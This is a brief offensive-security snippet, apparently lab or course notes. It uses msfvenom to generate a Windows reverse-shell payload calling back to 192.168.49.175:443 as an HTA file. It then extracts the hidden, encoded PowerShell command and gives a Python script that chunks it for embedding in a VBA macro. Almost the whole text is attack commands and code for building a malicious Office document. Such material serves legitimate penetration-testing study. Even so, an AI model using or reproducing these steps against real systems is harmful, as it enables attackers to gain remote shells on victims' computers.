$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.175 LPORT=443 -f hta-psh -o evil.hta
Inside this file, we can find the following command.
Paste contents of it to str variable in vba.py.
"powershell.exe -nop -w hidden -e aQBmACg......"
#!/usr/bin/python
str = "cmd.exe /c powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdA..."
n=50
for i in range(0, len(str), n):
print "Str = Str + " + '"'+ str[i:i+n] + '"'